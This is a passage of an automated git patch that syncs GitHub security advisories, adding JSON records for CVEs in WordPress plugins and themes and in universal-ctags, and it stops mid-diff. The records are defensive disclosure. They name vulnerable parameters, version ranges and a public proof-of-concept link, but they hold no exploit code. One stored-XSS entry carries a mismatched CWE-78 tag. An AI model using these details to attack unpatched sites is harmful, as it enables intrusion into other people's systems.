From 7203f6466f8d054a3b4130f47f2191774069c112 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 06:31:37 +0000 Subject: [PATCH 001/174] Advisory Database Sync --- .../GHSA-354p-69pj-7hrh.json | 25 ++++++ .../GHSA-3gjc-g73c-46x5.json | 25 ++++++ .../GHSA-4292-3qv2-cv3v.json | 40 ++++++++++ .../GHSA-43j7-cmcw-j9hr.json | 52 ++++++++++++ .../GHSA-4r69-36rj-xggj.json | 40 ++++++++++ .../GHSA-4wq4-57x2-fmhv.json | 44 ++++++++++ .../GHSA-568p-hhxc-vvx8.json | 29 +++++++ .../GHSA-5g55-5vv7-848g.json | 40 ++++++++++ .../GHSA-69fg-c96p-c6fq.json | 60 ++++++++++++++ .../GHSA-763r-9v7r-f8fj.json | 25 ++++++ .../GHSA-7f6r-mp5f-rh8r.json | 48 +++++++++++ .../GHSA-cpmc-9298-xjhp.json | 48 +++++++++++ .../GHSA-fv33-cj5h-48j8.json | 44 ++++++++++ .../GHSA-fvjg-wx7c-4qc5.json | 48 +++++++++++ .../GHSA-fx3v-rgv7-qq3x.json | 44 ++++++++++ .../GHSA-g4wh-mv47-2hg5.json | 80 +++++++++++++++++++ .../GHSA-g8mp-px4h-fw43.json | 64 +++++++++++++++ .../GHSA-gcff-gvxv-7jgm.json | 52 ++++++++++++ .../GHSA-ghf8-ggp8-97wj.json | 25 ++++++ .../GHSA-h858-mf2m-8jf4.json | 52 ++++++++++++ .../GHSA-jg87-hjf9-gf64.json | 25 ++++++ .../GHSA-m3jj-4hf6-wgch.json | 25 ++++++ .../GHSA-mcrh-3qmp-x37p.json | 44 ++++++++++ .../GHSA-pj33-46c7-rm7p.json | 52 ++++++++++++ .../GHSA-qph2-xm7h-wv73.json | 48 +++++++++++ .../GHSA-qw9p-rfpx-fxh5.json | 40 ++++++++++ .../GHSA-rgq3-q5rc-mjc3.json | 48 +++++++++++ .../GHSA-rj4g-w683-5gq4.json | 48 +++++++++++ .../GHSA-vfcp-69jm-85xv.json | 25 ++++++ .../GHSA-vrm4-h3r4-hh29.json | 25 ++++++ .../GHSA-wpf3-wv8v-2wxj.json | 40 ++++++++++ 31 files changed, 1305 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json diff --git a/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json new file mode 100644 index 0000000000000..2f5abda6b669e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-354p-69pj-7hrh", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27038" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27038" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json new file mode 100644 index 0000000000000..6ea96b837d889 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gjc-g73c-46x5", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27036" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27036" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json new file mode 100644 index 0000000000000..f6c829558b061 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4292-3qv2-cv3v", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12037" + ], + "details": "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12037" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/log/wp-404-auto-redirect-to-similar-post" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c20059de-9d81-4318-a015-8e402945828c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json new file mode 100644 index 0000000000000..b5371d7d0af4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43j7-cmcw-j9hr", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2025-12074" + ], + "details": "The Context Blog theme for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.5 via the 'context_blog_modal_popup' due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12074" + }, + { + "type": "WEB", + "url": "https://themes.svn.wordpress.org/context-blog/1.2.1/inc/ajax/modal-popup.php" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/changeset/297968" + }, + { + "type": "WEB", + "url": "https://wordpress.org/themes/context-blog" + }, + { + "type": "WEB", + "url": "https://www.postmagthemes.com/downloads/context-blog-free-wordpress-theme" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25552fdb-c55b-4390-a614-7c007c5fe7b1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json new file mode 100644 index 0000000000000..e24a813ced989 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r69-36rj-xggj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-11737" + ], + "details": "The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_sns_title' parameter in all versions up to, and including, 9.112.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11737" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402996%40vk-all-in-one-expansion-unit&new=3402996%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e7efb39-fada-4167-825c-21cc31948a63?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json new file mode 100644 index 0000000000000..e9956057d08ba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wq4-57x2-fmhv", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-6460" + ], + "details": "The Display During Conditional Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6460" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455051" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/display-during-conditional-shortcode/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ad39a3b0-5434-4595-a052-4b6e4adb2247?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json new file mode 100644 index 0000000000000..85d2b669e2761 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-568p-hhxc-vvx8", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1368" + ], + "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1368" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json new file mode 100644 index 0000000000000..b32d5ce03dc02 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g55-5vv7-848g", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12122" + ], + "details": "The Popup Box – Easily Create WordPress Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframeBox' shortcode in all versions up to, and including, 3.2.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12122" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3410472%40popup-box&new=3410472%40popup-box&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7eeb557-0528-422a-aae7-3f99154953df?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json new file mode 100644 index 0000000000000..d246f61aed11a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-69fg-c96p-c6fq", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2641" + ], + "details": "A weakness has been identified in universal-ctags ctags up to 6.2.1. The affected element is the function parseExpression/parseExprList of the file parsers/v.c of the component V Language Parser. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2641" + }, + { + "type": "WEB", + "url": "https://github.com/universal-ctags/ctags/issues/4369" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0116/blob/main/poc.v" + }, + { + "type": "WEB", + "url": "https://github.com/universal-ctags/ctags" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752768" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json new file mode 100644 index 0000000000000..778e6419c3092 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-763r-9v7r-f8fj", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27032" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27032" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json new file mode 100644 index 0000000000000..7f10555e9287f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f6r-mp5f-rh8r", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1639" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' and 'sort_by' parameters in all versions up to, and including, 5.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1639" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L136" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L138" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L14" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2cfdde5c-f0e3-4597-9789-3ff0347719c6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json new file mode 100644 index 0000000000000..24f4fe3bfb7e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpmc-9298-xjhp", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1296" + ], + "details": "The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.6/includes/classes/class-fpsml-shortcode.php#L108" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/trunk/includes/classes/class-fpsml-shortcode.php#L108" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458652%40frontend-post-submission-manager-lite&new=3458652%40frontend-post-submission-manager-lite&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92c52129-7cf5-4a1b-80a1-b01140e6a72b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json new file mode 100644 index 0000000000000..9f05303d25898 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv33-cj5h-48j8", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-13959" + ], + "details": "The Filestack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'filepicker' shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13959" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/tags/2.0.8/lib/shortcodes.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/trunk/lib/shortcodes.php#L20" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2777794d-2c0a-4843-bed8-78e607d4e796?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json new file mode 100644 index 0000000000000..b637ccb2b2efb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvjg-wx7c-4qc5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1072" + ], + "details": "The Keybase.io Verification plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.5. This is due to missing nonce validation when updating plugin settings. This makes it possible for unauthenticated attackers to update the Keybase verification text via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1072" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/tags/1.4.5/admin/code/write.php#L51" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/trunk/admin/code/write.php#L51" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3455171%40wp-keybase-verification&new=3455171%40wp-keybase-verification&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4bbf55eb-7738-4c52-ac9d-a67d159e56cf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git 